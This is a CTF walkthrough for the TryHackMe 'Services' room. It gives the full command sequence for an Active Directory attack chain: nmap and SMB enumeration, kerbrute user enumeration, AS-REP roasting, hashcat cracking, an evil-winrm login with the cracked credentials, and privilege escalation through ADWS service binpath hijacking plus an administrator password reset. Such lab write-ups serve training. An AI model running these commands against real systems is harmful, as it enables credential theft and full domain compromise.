"Services" TryHackMe Write‐up - CTF-Walkthroughs/CTF-Walkthroughs-Wiki GitHub Wiki

Screenshot from 2023-07-24 12-07-44

Services-THM-Walkthrough

This is the writeup for the Services CTF challenge on TryHackMe! https://tryhackme.com/room/services

tutorial video

services-title-thumbnail

tags: enumerate, hash cracking, exploit, brute-force, kerbrute

Highlight: Enumerating active directory users using kerbrute, capturing a password hash using AS-REP-ROASTING.

ENUMERATION

First let's kick things off with some classic nmap scans to get a lay of the land. Initial Setup

export IP=10.10.117.221 export myIP=10.13.24.71

sudo nmap -v --min-rate 10000 <Target's IP address> -p- | grep open

We can use standard expressionw to efficiently sort nmap results and grab all of the open ports for a script scan.

cat tmp | sed 's/\// /g' | awk '{print $1}' | tr "\n" "," Screenshot from 2023-07-24 11-49-23

We'll follow up now with a full scan: sudo nmap -v -sVC -oN nmap.txt <Target's IP address> -p <ports>

roasting: smbclient -L //$IP/ smbmap -u 'anonymous' -H $IP

ENUMERATION: walk the port 80 website. We quickly identify some employee names from the employees listed on the site. Screenshot from 2023-07-24 12-03-22

And here is a naming convention, revealed by the contact email: 3

Using the naming convention from the contact email, we can compile a shortlist now of possible usernames. Screenshot from 2023-07-24 12-12-54

Next, we'll move on to active directory username enumeration.

KERBRUTE

kerbrute userenum --dc $IP -d services.local users.txt

We found some valid users! Screenshot from 2023-07-24 12-20-23

AS-REP ROASTING WITH GetNPUsers.py: GetNPUsers.py -dc-ip $IP -request 'services.local/' -usersfile users.txt -format hashcat Screenshot from 2023-07-24 12-22-08

Boom Shack-a-lacka! j.rock hash is revealed!

CRACKING THE HASH WITH HASHCAT

Use hashcat to crack the hash: `hashcat -m 18200 hash.txt rockyou.txt'

Bingo! We are in business. Let's log in next with evil-winrm with our newly-found creds. j.rock:Serviceworks1

EVIL-WINRM

evil-winrm -i $IP -u j.rock -p Serviceworks1

LOCAL ENUMERATION

whoami /all

We see that j.rock is in the

Next, let's check services:

services Screenshot from 2023-07-24 12-26-09

Our privesc path forward will be binpath hijacking with the ADWS service.

BINPATH HIJACKING

sc.exe config ADWS binpath="net localgroup administrators j.rock /add" start and stop the service log out/in

CHANGE THE ADMIN PASSWORD

net user administrator hellothisisatest123!

log out and back in with admin

grab the root flag! Screenshot from 2023-07-24 12-42-11

⚠️ **GitHub.com Fallback** ⚠️